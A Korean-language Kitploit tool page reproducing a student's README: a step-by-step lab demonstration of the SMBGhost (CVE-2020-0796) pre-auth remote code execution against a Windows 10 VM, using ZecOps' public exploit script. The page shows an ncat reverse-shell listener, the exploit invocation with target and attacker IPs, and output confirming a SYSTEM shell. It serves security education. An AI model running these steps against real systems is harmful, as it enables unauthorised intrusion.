Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-0796-SMBGhost-Exploit-Demo — # CVE-2020-0796 (SMBGhost) 교육용 PoC 익스플로잇 Windows SMBv3에서 사전 인증(pre-auth) RCE를 시연하는 CVE-2020-0796 (SMBGhost) 교육용 개념 증명 익스플로잇입니다. 단계별 랩 구성, 오프셋 계산, 통제된 사이버 보안 교육을 위한 리버스 셸 실행을 포함합니다. | Kitploit
도구/GitHubGitHub/tdevworks/cve-2020-0796-smbghost-exploit-demo
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationRemote Access ToolPayload DevelopmentBinary ExploitationLabs & Practice
GitHub
tdevworks/cve-2020-0796-smbghost-exploit-demo

CVE-2020-0796-SMBGhost-Exploit-Demo

# CVE-2020-0796 (SMBGhost) 교육용 PoC 익스플로잇 Windows SMBv3에서 사전 인증(pre-auth) RCE를 시연하는 CVE-2020-0796 (SMBGhost) 교육용 개념 증명 익스플로잇입니다. 단계별 랩 구성, 오프셋 계산, 통제된 사이버 보안 교육을 위한 리버스 셸 실행을 포함합니다.

저장소 보기
351년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-0796 익스플로잇 데모 (SMBGhost)

이 프로젝트는 SMBGhost로도 알려진 CVE-2020-0796의 개념 증명(PoC) 익스플로잇을 시연합니다. SMBv3를 사용하는 Windows 10 및 Windows Server 시스템에 영향을 미치는 치명적인 사전 인증 RCE 취약점입니다. 이 프로젝트는 학교 사이버 보안 프로젝트의 일환으로 개발되었습니다. 모든 익스플로잇 코드의 크레딧은 ZecOps에 있습니다. 저는 통제된 실습 환경에서 CVE-2020-0796의 악용을 시연하기 위해 교육 목적으로만 이를 사용하고 각색했습니다.

데모 요구 사항

이 시연을 재현하려면 다음 설정이 필요합니다.

공격자 머신

  • VirtualBox (VM 네트워킹에 NATNetwork 사용)
  • Windows 10 (모든 최신 버전)
  • Python 3.x (시스템 PATH에 추가)
  • Netcat (Nmap에 포함되어 있거나 별도 설치)
  • GitHub PoC의 익스플로잇 스크립트:
    SMBleedingGhost.py by ZecOps

대상 머신

  • VirtualBox (동일한 NATNetwork 구성)
  • Windows 10 버전 1903, 릴리스 19H1
    빌드 18362.356 – 2019.09, Home 또는 Pro 에디션 (x64)
  • Windows 방화벽 비활성화 (포트 445 접근 허용)
  • GitHub PoC의 오프셋 계산 스크립트:
    calc_target_offsets.bat by ZecOps

시연: 단계별 익스플로잇

1단계: 두 VM의 IP 주소 확인

  1. 공격자 및 대상 가상 머신 모두에서 명령 프롬프트를 실행합니다.

  2. 각 머신에서 다음 명령을 실행합니다.

    root@kitploit:~
    ipconfig
    

Screenshot 2025-05-16 172329

  1. VM의 IP 주소를 기록해 두세요. 이후 단계에서 사용합니다.

2단계: 대상 VM에서 오프셋 계산

  1. 대상 VM에서 CVE-2020-0796-RCE-POC-master 폴더로 이동합니다.
  2. calc_target_offsets.bat 스크립트를 더블클릭하여 실행합니다.
  • 이 스크립트는 익스플로잇에 필요한 메모리 오프셋을 생성합니다.
  • 창을 열어 두고 표시된 값을 기록해 두세요. 다음 단계에서 사용합니다.

Screenshot 2025-05-16 172350


3단계: 공격자 VM에서 익스플로잇 스크립트 업데이트

  1. 공격자 VM에서 동일한 CVE-2020-0796-RCE-POC-master 폴더를 엽니다.
  2. SMBleedingGhost.py를 마우스 오른쪽 버튼으로 클릭하고 메모장으로 엽니다.
  3. SMBleedingGhost.py 파일에서 아래로 스크롤하여 OFFSETS = {로 시작하는 부분을 찾습니다.
  4. 기존 오프셋 값을 대상 VM에서 얻은 값으로 바꿉니다.
  5. 편집 후 파일을 저장합니다.
  6. 이제 대상 VM의 오프셋 창을 닫아도 됩니다.

Screenshot 2025-05-16 172403


4단계: 공격자 VM에서 Netcat 리스너 시작

새 명령 프롬프트를 열고 다음을 실행합니다:

root@kitploit:~
ncat -lvp 4321
  • 이 명령은 포트 4321에 리스너를 설정하여 익스플로잇 성공 시 대상 VM에서 역방향 셸을 받습니다.
  • 필요에 따라 포트 번호를 변경할 수 있습니다.

Screenshot 2025-05-16 172419


5단계: 공격자 VM에서 익스플로잇 실행

  1. 다른 명령 프롬프트를 열고 PoC 디렉터리로 이동합니다 (저는 데스크톱에 저장했습니다):
root@kitploit:~
cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
  1. 적절한 IP와 포트를 사용하여 익스플로잇을 실행합니다:
root@kitploit:~
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>

Screenshot 2025-05-16 172450

이 데모에서 사용된 예시:

root@kitploit:~
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
  • 192.168.18.61: 대상 VM IP
  • 192.168.18.62: 공격자 VM IP
  • 4321: netcat 리스너에 사용된 포트

익스플로잇 결과

성공하면 netcat 창에 다음이 표시됩니다:

root@kitploit:~
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

이것은 다음을 확인합니다:

  • 대상 VM이 익스플로잇되었음
  • 공격자 VM이 이제 시스템 수준 권한을 보유함

다음을 실행하여 접근 권한을 검증할 수 있습니다:

root@kitploit:~
whoami

그러면 다음 결과가 표시됩니다:

root@kitploit:~
whoami
nt authority\system

즉, 공격자 VM이 이제 대상 VM에 대해 시스템 수준 권한을 보유하게 됩니다.

Screenshot 2025-05-16 172512

다음을 실행할 수도 있습니다:

root@kitploit:~
ipconfig

대상 VM의 네트워크와 상호 작용하고 있는지 확인하려면 다음을 실행합니다.

Screenshot 2025-05-16 172550

참고: 익스플로잇 후 대상 VM이 충돌할 수 있습니다. 충돌하면 다시 시작하면 됩니다. 공격자 세션은 재부팅 후 다시 설정해야 합니다.

감사의 말

이 시연은 ZecOps가 개발한 공개적으로 제공되는 개념 증명을 기반으로 합니다.

모든 익스플로잇 코드의 크레딧은 ZecOps에 있습니다. 저는 통제된 실습 환경에서 CVE-2020-0796의 악용을 시연하기 위해 교육 목적으로만 이를 사용하고 각색했습니다.

참고 자료

  • CVE-2020-0796 원격 코드 실행 PoC

작성자

@tdevworks

면책 조항

이 저장소는 교육 목적으로만 만들어졌습니다.

시연된 모든 도구, 스크립트 및 기술은 통제된 실습 환경에서 사이버 보안 취약점을 이해하는 데 도움을 주기 위한 것입니다. 소유하지 않았거나 테스트할 명시적 권한이 없는 시스템이나 네트워크에서 제공된 자료를 사용하려고 시도하지 마십시오.

소프트웨어의 오용에 대한 책임은 작성자에게 있지 않습니다.

도구 다운로드